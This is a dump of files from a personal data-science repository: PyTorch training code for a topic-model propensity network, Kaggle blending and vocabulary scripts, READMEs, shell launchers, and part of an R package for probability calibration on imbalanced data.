"alpha_fraction": 0.558305025100708, "alphanum_fraction": 0.5637212991714478, "avg_line_length": 39.943477630615234, "blob_id": "386e495ae9ad4e46a3357ca1d9fbe62d3ae27b2c", "content_id": "42a027b49289b67a4567e4918884cf547479a5bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9416, "license_type": "no_license", "max_line_length": 110, "num_lines": 230, "path": "/textual_causality/etm-ps/run_ps2.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Train an ETM on CNNDM.\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import kl_div\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as sched\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import get_train_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM, PSNet\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=True)\n log = util.get_logger(args.save_dir, args.name)\n tbx = SummaryWriter(args.save_dir)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n\n # Set random seed\n log.info(f'Using random seed {args.seed}...')\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get data loader\n log.info('Building dataset...')\n train_dataset = CNNDM(os.path.join(args.data_dir, \"train\"), args.model_type, is_test = False)\n train_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers, \n collate_fn=train_collate_fn)\n val_dataset = CNNDM(os.path.join(args.data_dir, \"val\"), args.model_type, is_test = False)\n val_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n val_loader = DataLoader(val_dataset, \n batch_size=args.batch_size, \n shuffle=False, \n num_workers=args.num_workers, \n collate_fn=val_collate_fn)\n\n # Get ETM\n log.info('Building ETM...')\n etm = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"ETM: {etm}\")\n\n etm = nn.DataParallel(etm, args.gpu_ids)\n log.info(f'Loading ETM checkpoint from {args.etm_load_path}...')\n etm= util.load_model(etm, args.etm_load_path, args.gpu_ids, return_step=False)\n\n etm = etm.to(device)\n etm.eval()\n for param in etm.parameters():\n param.requires_grad = False\n\n # get PS model\n log.info('Building Propensity Neural Net Model...')\n model = PSNet(n_features=args.num_topics)\n log.info(f\"PS Model: {model}\")\n \n model = nn.DataParallel(model, args.gpu_ids)\n if args.ps_load_path:\n model, step = util.load_model(model, args.ps_load_path, args.gpu_ids)\n else:\n step = 0\n \n model = model.to(device)\n model.train()\n ema = util.EMA(model, args.ema_decay)\n\n # Get saver\n saver = util.CheckpointSaver(args.save_dir,\n max_checkpoints=args.max_checkpoints,\n metric_name=args.metric_name,\n maximize_metric=args.maximize_metric,\n log=log)\n\n\n # Get optimizer and scheduler and loss\n if args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2_wd) # l2 weight decay\n elif args.optimizer == 'adagrad':\n optimizer = optim.Adagrad(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'adadelta':\n optimizer = optim.Adadelta(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'rmsprop':\n optimizer = optim.RMSprop(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'asgd':\n optimizer = optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.l2_wd)\n else:\n print('Defaulting to vanilla SGD')\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n scheduler = sched.LambdaLR(optimizer, lambda s: 0.999 ** s) # Constant LR\n criterion = nn.BCELoss()\n\n # Train\n log.info('Training...')\n steps_till_eval = args.eval_steps\n epoch = step // len(train_dataset)\n while epoch != args.num_epochs:\n epoch += 1\n log.info(f'Starting epoch {epoch}...')\n with torch.enable_grad(), \\\n tqdm(total=len(train_loader.dataset)) as progress_bar:\n for (i, batch) in enumerate(train_loader):\n # Setup for forward\n optimizer.zero_grad()\n model.zero_grad() # added for performance consideration\n\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n\n if torch.isnan(normalized_bows).any():\n log.info(f\"There are NaNs in bows at batch {i}\")\n\n # Forward\n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x K)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, )\n loss = criterion(output, target)\n \n # Backward\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n optimizer.step()\n scheduler.step()\n ema(model, step // batch_size)\n\n # Log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_postfix(epoch=epoch, \n loss=loss.item())\n tbx.add_scalar('train/loss', loss.item(), step)\n tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = args.eval_steps\n\n # Evaluate and save checkpoint\n log.info(f'Evaluating at step {step}...')\n ema.assign(model)\n results = evaluate(args, etm, model, val_loader, device)\n saver.save(step, model, results[args.metric_name], device)\n ema.resume(model)\n\n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'Val {results_str}')\n \n # Log to TensorBoard\n log.info('Visualizing in TensorBoard...')\n for k, v in results.items():\n tbx.add_scalar(f'val/{k}', v, step)\n\n\ndef evaluate(args, etm, model, data_loader, device):\n bce_meter = util.AverageMeter()\n acc_meter = util.AverageMeter()\n model.eval()\n criterion = nn.BCELoss()\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n for batch in data_loader:\n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n \n _, theta, _, _, _ = etm(normalized_bows=normalized_bows) # (batch_size x embed_size)\n output = model(theta).squeeze() # (batch_size, )\n src_input_lens = batch[\"src_input_lens\"].to(device)\n target = 1.0 * (src_input_lens > args.doc_len_threshold) # (batch_size, ), 1.0 to make it to float\n loss = criterion(output, target)\n pred = 1.0 * (output > 0.5)\n accuracy = (1.0 * (pred == target)).mean()\n \n bce_meter.update(loss.item(), batch_size)\n acc_meter.update(accuracy.item(), batch_size)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(BCE=bce_meter.avg, \n ACC=acc_meter.avg)\n \n results_list = [('BCE', bce_meter.avg), ('ACC', acc_meter.avg)]\n results = OrderedDict(results_list)\n model.train()\n return results\n\nif __name__ == '__main__':\n main(get_train_args())" }, { "alpha_fraction": 0.6756756901741028, "alphanum_fraction": 0.6860706806182861, "avg_line_length": 59.25, "blob_id": "b3e1b38c16b21aace0ffe9a4c05ae3ece755e99e", "content_id": "3a1a2555bced505a14a2d8f2f1a0d5eac8bdd15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/Kaggle_Travelers/notebooks/Combination.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import pandas as pd\nlgb_pred = pd.read_csv('../data/predictions/prediction_lightgbm.csv')\nxgb_pred = pd.read_csv('../data/predictions/prediction_xgboost.csv')\ncom_pred = pd.merge(lgb_pred, xgb_pred, on = \"claim_number\", how = \"left\")\ncom_pred['fraud'] = 0.6 * com_pred['fraud_x'] + 0.4 * com_pred['fraud_y']\ncom_pred.drop(['fraud_x', 'fraud_y'], axis = 1, inplace = True)\ncom_pred = com_pred.set_index('claim_number')\ncom_pred.to_csv('../data/predictions/combined_predictions.csv')" }, { "alpha_fraction": 0.4301075339317322, "alphanum_fraction": 0.5161290168762207, "avg_line_length": 22.25, "blob_id": "17bf39a4e1bbf9d3feb755ae1a2a92e4c69fde42", "content_id": "fe5f35543a9f53e2d7cefa79aa8109f6a7136ca6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 93, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/textual_causality/etm-ps/run_ps.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_ps.py \\\n --name ps \\\n --gpu_ids 4 5 6 7\\\n 2>&1 | tee logs/train_05.log\n" }, { "alpha_fraction": 0.5937336683273315, "alphanum_fraction": 0.6167101860046387, "avg_line_length": 34.48147964477539, "blob_id": "e4f6b3acc7764f82f43a8910d309b833cadc3470", "content_id": "322527ad235643313095663ed0498a039f8353bc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1915, "license_type": "permissive", "max_line_length": 111, "num_lines": 54, "path": "/rbm_summarizer/train_textRBM/get_top15k_words.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# a file to get a list of top 15k most frequent words in the cnn/dailymail data\n\nfrom __future__ import unicode_literals, print_function, division\n\n# load modules in other files\nimport sys\nimport os\n\n\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom data_util import utils\nfrom data_util import config\n\n\n## step 1: load the stopwords provided by Stanford CoreNLP\nf = open(\"/home/yang6367/gitrepos/cnn-dailymail/corenlp-stopwords.txt\")\nstopwords = f.read().split('\\n')\nnew_stopwords = ['!!!', '!!!!', \"'''\", \"**\", \"***\", \"****\", \"*****\", \"******\", \"*******\", \"--\", \"-rcb-\", \"/\", ]\nstopwords = stopwords + new_stopwords\n\n## step 2: create a dictionary containing the lemmatized word count\nword_to_count = {}\nnum_words = 0\nmax_size = 50000\n\nwith open(config.vocab_path, 'r') as vocab_f:\n for line in vocab_f:\n pieces = line.split()\n try:\n # if the word is not a stopword, then add the count to the dictionary\n if pieces[0] not in stopwords:\n w = utils.lem(pieces[0]) # lemmatize the word\n if w in word_to_count: # if already in, then add up the count\n word_to_count[w] += int(pieces[1])\n else:\n word_to_count[w] = int(pieces[1])\n num_words += 1\n except:\n print(pieces)\n if num_words >= max_size:\n break\n\n## step 3: get top15k words\n# sort the dictionary by the count\nword_to_count_sorted = sorted(word_to_count.items(), key=lambda x: x[1], reverse=True)\n# choose the top 15k words\nword_to_count_top15k = word_to_count_sorted[:15000]\nwords_top15k = [key for key, value in word_to_count_top15k]\n# write the list of words to a txt file\nwith open(\"/home/yang6367/gitrepos/cnn-dailymail/top15k_words.txt\", \"w\") as f:\n f.writelines(\"%s\\n\" % word for word in words_top15k)" }, { "alpha_fraction": 0.7392638325691223, "alphanum_fraction": 0.7556236982345581, "avg_line_length": 53.38888931274414, "blob_id": "d57be4bfae570258844948ce712de7a14054fc13", "content_id": "4f66d418fe11df74fb3b76a6adda9ee12fa81f70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 978, "license_type": "no_license", "max_line_length": 315, "num_lines": 18, "path": "/lyft/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Kaggle: Lyft Motion Prediction for Autonomous Vehicles\n\n\n**Team Name**: Statdogs\n\n**Team members**: Dewei Chen, Xuesong Hou, Chunlin Li, Yu Yang\n\n**Ranking in Leaderboard**: [52nd](https://www.kaggle.com/yuyangstat) out of 935 teams.\n\nThe [datasets](https://www.kaggle.com/c/lyft-motion-prediction-autonomous-vehicles/data) for this competition are well preprocessed by the package [l5kit](https://github.com/lyft/l5kit). Check the [competition overview](https://www.kaggle.com/c/lyft-motion-prediction-autonomous-vehicles/overview) for more details.\n\n### Main Code\n Our models are CNN-based, and the final model is the ensemble of ResNet18, ResNet34, DenseNet121, EffecientNetB4, and EfficientNetB7.\n- `train.py`: train the models.\n- `eval.py`: evaluate the trained models on the validation set.\n- `pred.py`: predict on the test set.\n- `models.py`: the model frameworks using EfficientNet and DenseNet as backbone architectures. (ResNet not included here.)\n- `utils.py`: utility functions." }, { "alpha_fraction": 0.4421052634716034, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 22.75, "blob_id": "28a7c268f375fd22e7dfd4dbf22d6439b3e1d9a5", "content_id": "602439ff360be93d20b7dff0f1a28b6ef9eb86ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/textual_causality/etm-ps/run_etm.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_etm.py \\\n --name etm \\\n --gpu_ids 4 5 6 7\\\n 2>&1 | tee logs/train_01.log\n" }, { "alpha_fraction": 0.5049505233764648, "alphanum_fraction": 0.5891088843345642, "avg_line_length": 32.66666793823242, "blob_id": "b9f5f832d8a653710e72641d10b737526d411d4a", "content_id": "064199499404cb18af557359236600218fcbd2d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 202, "license_type": "no_license", "max_line_length": 84, "num_lines": 6, "path": "/textual_causality/etm-ps/test_ps2.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./test_ps2.py \\\n --name ps2 \\\n --gpu_ids 4 5 6 7\\\n --split \"train\" \\\n --ps_load_path \"/home/yang6367/text-causal/etm/save/train/ps2-01/best.pth.tar\" \\\n 2>&1 | tee logs/test_02.log\n" }, { "alpha_fraction": 0.7588075995445251, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 60.66666793823242, "blob_id": "93c317261fb0f2eb1379c1d20b98e8d2b64721c2", "content_id": "6f3dc758a1493875e1adfbbf7d4066000d73640b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 369, "license_type": "no_license", "max_line_length": 102, "num_lines": 6, "path": "/textual_causality/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# PUBH 8485 Final Project: Textual Causal Inference on CNNDM \n\n- `ate` contains the scripts for simulation and ATE estimation.\n- `etm-ps` contains the scripts for fitting the ETM model and the neurl propensity score model.\n- `report` contains the final report files.\n- `results` contains the ATE estimation results, with 1 indicating Scheme 1 and 2 indicating Scheme 2." }, { "alpha_fraction": 0.5689677000045776, "alphanum_fraction": 0.6071200966835022, "avg_line_length": 38.6708869934082, "blob_id": "001e3988a11ab55e6db27e32d4048f29b7cdefd6", "content_id": "c85491a80e0800bf98aaac015af17c1be171eb29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 15678, "license_type": "no_license", "max_line_length": 148, "num_lines": 395, "path": "/imbCalib/package/imbCalib/R/calibrate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\n\n# import libraries\nrequire('mltools')\nrequire('caTools')\nrequire('e1071')\nrequire('randomForest')\nrequire('foreach')\nrequire('doParallel')\nrequire('abind')\n\n\n#' Get binned probabilities.\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param nbins An integer. The number of bins.\n#'\n#' @return A list with two elements. The first element is the binned actual fractions, and\n#' the second element is the binned predicted probabilites.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' binProbs(y.true, y.prob)\n#'\nbinProbs <- function(y.true, y.prob, nbins=5){\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n # consider only uniform case temporarily\n bins <- seq(0, 1+1e-8, length.out = nbins+1)\n bin.ids <- as.factor(as.numeric(bin_data(y.prob, bins = bins, binType = \"explicit\")))\n output <- list(prob.true = sapply(split(y.true, bin.ids), mean),\n prob.pred = sapply(split(y.prob, bin.ids), mean))\n return (output)\n}\n\n\n#' Standard Brier Score\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#'\n#' @return A numeric scalar. The standard Brier score.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' brier(y.true, y.prob)\n#'\n#' @details\n#' Brier score measures the fit of probability estimates to the observed data.\n#' It is defined as the mean squared difference between the observed labels the\n#' estimated probability. A smaller value means a better calibration.\n#' \\deqn{BS = \\frac{\\sum_{i=1}^N (y_i - \\hat{P}(y_i | x_i))^2}{N}}\n#'\nbrier <- function(y.true, y.prob) {\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n return(mean((y.true - y.prob)**2))\n}\n\n\n#' Stratified Brier Score\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#'\n#' @return A list with three elements. The 1st is the standard Brier score, The 2nd is the Brier score\n#' for the positive class, and the 3rd is the Brier score for the negative class.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' stratifiedBrier(y.true, y.prob)\n#'\n#' @details\n#' Stratified Brier Score evaluates the goodness of calibration under the imbalanced scenario.\n#' \\deqn{BS^+ = \\frac{\\sum_{y_i=\\text{pos_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}}\n#' \\deqn{BS^- = \\frac{\\sum_{y_i=\\text{neg_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}}\n#'\n#' @references\n#' Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data.\n#' Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n#'\nstratifiedBrier <- function(y.true, y.prob) {\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n bs <- mean((y.true - y.prob)**2)\n bs.plus <- mean((y.true - y.prob)[y.true == 1]**2)\n bs.minus <- mean((y.true - y.prob)[y.true == 0]**2)\n\n return(list('BS' = bs, 'BS+' = bs.plus, 'BS-' = bs.minus))\n}\n\n\n#' Plot calibration diagram (reliability plot).\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param mod.name A string. The name of the model you want to plot, used in the legend.\n#' @param nbins An integer. The number of bins.\n#'\n#' @return A plot with two subplots. The top one is the calibration curve plot, and the bottom\n#' one is the histogram of the predicted probabilities.\n#' @export\n#'\n#' @examples\n#' y.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\n#' y.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n#' 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n#' calibCurve(y.true, y.prob, 'Example')\n#'\ncalibCurve <- function(y.true, y.prob, mod.name, nbins=5){\n\n stopifnot(is.numeric(y.true) & is.numeric(y.prob))\n stopifnot(length(y.true) == length(y.prob))\n\n calib.out <- binProbs(y.true, y.prob, nbins = nbins)\n brier.score <- brier(y.true, y.prob)\n\n layout(matrix(c(1, 1, 1, 2), 4, 1, byrow = TRUE))\n\n plot(c(0, 1), c(0, 1), lty = 2, col = 'black', type = 'l',\n main = 'Calibration Curve (Reliability Diagram)', xlab = \"Mean predicted value\",\n ylab = \"Fraction of positives\", xlim = c(0, 1), ylim = c(0, 1))\n\n lines(calib.out$prob.pred, calib.out$prob.true, type = 'o', lty = 1, col = 'blue')\n\n legend.name <- paste(mod.name, \" (\", round(brier.score, 4), \")\", sep = \"\")\n legend(\"bottomright\",\n legend = c(legend.name, \"Perfectly calibrated\"),\n lty = c(1, 2), col = c(\"blue\", \"red\"), cex = 0.5)\n\n hist(y.prob, breaks = nbins + 1, main = \"\", xlab = \"Mean predicted value\")\n\n}\n\n#' Plot comparison among calibrations.\n#'\n#' @description\n#' Do comparisons among different models or different calibration methods, in terms of the\n#' calibrated probabilities.\n#'\n#' @param y.true A numeric vector. The true response.\n#' @param y.prob A numeric vector. The predicted probabilites.\n#' @param mod.name A string. The name of the model you want to plot, used in the legend.\n#' @param nbins An integer. The number of bins.\n#'\n#' @return A plot with calibration curves given by different calibrations.\n#' @export\n#'\n#' @examples\n#' library('e1071')\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' lr <- glm(y ~ ., data = train_set, family = \"binomial\")\n#' prob.lr <- predict(lr, X.test, type = \"response\")\n#' calibCurve(y.test, prob.lr, \"Logistic\")\n#' nb <- naiveBayes(y ~ ., data = train_set)\n#' prob.nb <- predict(nb, X.test, type = \"raw\")[, 2]\n#' calibCurve(y.test, prob.nb, \"Naive Bayes\")\n#' comparisonPlot(y.test, list(prob.lr, prob.nb), c(\"Logistic\", \"Naive Bayes\"))\n#'\n#' @references\n#' \\href{https://scikit-learn.org/stable/auto_examples/calibration/plot_compare_calibration.html}{sklearn: Comparison of Calibration of Classifiers}\n#'\ncomparisonPlot <- function(y.true, probs, mod.names, nbins=5){\n\n # probs should be a list, mod.names should be a vector\n n <- length(probs)\n brier.score <- unlist(lapply(probs, function(x) brier(y.true, x)))\n\n plot(c(0, 1), c(0, 1), lty = 2, lwd = 1, type = 'l', col = 1,\n main = \"Comparison of Calibration Curve\",\n xlab = \"Mean predicted value\", ylab = \"Fraction of positives\",\n xlim = c(0, 1), ylim = c(0, 1))\n\n for (i in 1:n){\n calib.out <- binProbs(y.true, probs[[i]], nbins = nbins)\n lines(calib.out$prob.pred, calib.out$prob.true, type = 'o', lty = 1, lwd=2, col = i+1)\n }\n\n legend.names <- mapply(function(name, score) {\n paste(name, \" (\", round(score, 4), \")\", sep = \"\")},\n mod.names, brier.score)\n legend(\"bottomright\", legend = c(\"Perfectly calibrated\", legend.names),\n lty = c(2, rep(1, n)), lwd = c(1, rep(2, n)), col = 1:(n+1), cex = 0.5)\n\n}\n\n\n#' Dataset under-sampling\n#'\n#' @param pos_set A dataframe. The dataframe for the positive class.\n#' @param neg_set A dataframe. The dataframe for the negative class.\n#'\n#' @return A dataframe. An under-sampled dataset, with equal number of positive class and\n#' negative class.\n#' @export\n#'\nunderSample <- function(pos_set, neg_set) {\n\n stopifnot(dim(pos_set)[2] == dim(neg_set)[2])\n\n sample_pos_set <- pos_set[sample(nrow(pos_set), nrow(pos_set), replace = TRUE),]\n\n sample_neg_set <- neg_set[sample(nrow(neg_set), nrow(pos_set), replace = TRUE),]\n\n sample_set <- rbind(sample_pos_set, sample_neg_set)\n\n return(sample_set)\n}\n\n\n\n\n#' Bagged undersampled calibration.\n#'\n#' @description Bagged undersampled calibration, can do both the weighted average and\n#' simple average on the bagged probabilities.\n#' Parallel computing is enabled to speed up the bagging procedure by specifying `ncluster`.\n#' Choose between weighted average of bagged probabilities or simple average using `ntimes`.\n#'\n#' @details The simple average and the weighted average of the bagged probabilities are defined\n#' as below.\n#'\n#' Simple average:\n#' \\deqn{\\hat{P}(y_i | x_i) = \\frac{1}{k}\\sum_{j=1}^k \\hat{P}_j(y_i | f_{ij})}\n#'\n#' Weighted average:\n#' \\deqn{\\hat{P}(y_i | x_i) = \\frac{1}{z}\\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))} \\hat{P}_j(y_i | f_{ij}),}\n#' where \\deqn{z = \\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))}.}\n#'\n#' @param trainset A dataframe. The training dataset.\n#' @param newX An array. The feature matrix of the new test data.\n#' @param response_name A string. The name of the response column in the training dataset.\n#' @param model A string. The model to calibrate. Options: `'svm'`, `'lr'`, `'nb'`, `'rf'`.\n#' @param formula A formula. The formula of the model.\n#' @param pos_label An integer. 0 or 1. The label for the positive class.\n#' @param nbags An integer. How many sample set are used for bagging. Note that a large value\n#' will not lead to overfitting and will reduce the variance more, with the only cost being\n#' heavy computation load.\n#' @param ntimes An integer. The number of times to run the model within each sample set.\n#' When `ntimes=1`, the output is the simple average of `nbags` sets of probabilities,\n#' and when `ntimes > 1`, the output is the weighted average, with the weight being the empirical\n#' variance of `ntimes` predicted probabilities within each sample set.\n#' @param ncluster An integer. The number of clusters to use in the parallel implementaion.\n#' @param ... Arguments with variable lengths. The extra arguments for specifying the model.\n#'\n#' @return A numeric vector. The calibrated probabilities by weighted bagged undersampled method.\n#' @export\n#'\n#' @examples\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' # standard calibration\n#' svc <- svm(formula = as.factor(y) ~ ., data = train_set, type = 'C-classification',\n#' kernel = 'linear', probability = TRUE)\n#' pred <- predict(svc, X.test, probability = TRUE)\n#' dec.svc <- attr(pred, 'decision.values')\n#' prob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\n#' stratifiedBrier(y.test, prob.svc)\n#' # calibration using bagged undersampling method (simple average)\n#' bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification',\n#' kernel = 'linear', nbags = 30, ntimes = 1, ncluster = 4)\n#' stratifiedBrier(y.test, bag.prob.svm)\n#' # calibration using weighted bagged undersampling method (weighted average)\n#' weighted.bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification',\n#' kernel = 'linear', nbags = 30, ntimes = 20, ncluster = 4)\n#' stratifiedBrier(y.test, weighted.bag.prob.svm)\n#'\n#' # comparison plot\n#' comparisonPlot(y.test, list(prob.svc, bag.prob.svm, weighted.bag.prob.svm),\n#' c(\"SVM\", \"bagged-under SVM\", \"Weighted-bagged-under SVM\"), nbins = 8)\n#'\n#' @references\n#' Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data.\n#' Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n#'\nbagCalibrate <- function(trainset, newX, response_name, model, formula=as.factor(y) ~ .,\n pos_label=1, nbags = 25, ntimes = 1, ncluster=4, ...) {\n\n stopifnot(response_name %in% names(trainset))\n\n # change response name to 'y'\n if (response_name != 'y') {\n colnames(trainset)[names(trainset) == response_name] <- 'y'\n }\n\n # obtain positive set and negative set\n pos_set <- subset(trainset, y == pos_label)\n neg_set <- subset(trainset, y != pos_label)\n\n # define the combine function used in foreach\n if (ntimes > 1) {\n cfun <- function(...) {abind(..., along=3)}\n } else {\n cfun <- function(...) {abind(..., along=2)}\n }\n\n #setup parallel back end to use 4 processors\n cl<-makeCluster(4)\n registerDoParallel(cl)\n\n wprobs <-foreach(j=1:nbags, .combine=cfun, .multicombine = TRUE, .packages = c('foreach'),\n .export = c('underSample', 'cfun')) %dopar% {\n\n # obtain sample set\n sample_set <- underSample(pos_set, neg_set)\n\n # for each sample set, run ntimes to obtain the empirical variance, and hence the weighted probs\n probs <- foreach(i=1:ntimes, .combine = cbind, .packages = c('e1071', 'randomForest')) %do% {\n\n if (model == 'svm') {\n\n clf <- svm(formula = formula, data = sample_set, ..., probability = TRUE)\n pred <- predict(clf, newX, probability = TRUE)\n prob_df <- as.data.frame(attr(pred, \"probabilities\")) # predicted probability\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n } else if (model == 'lr') {\n\n clf <- glm(formula = formula, data = sample_set, family = \"binomial\", ...)\n prob <- predict(clf, newX, type = \"response\")\n\n } else if (model == 'nb') {\n\n clf <- naiveBayes(formula = formula, data = sample_set, ...)\n prob_df <- as.data.frame(predict(clf, newX, type = \"raw\"))\n colnames(prob_df)[names(prob_df) == pos_label] <- 'positive'\n prob <- prob_df$positive\n\n } else if (model == 'rf') {\n\n clf <- randomForest(formula = formula, data = sample_set, ...)\n prob_df <- as.data.frame(predict(clf, 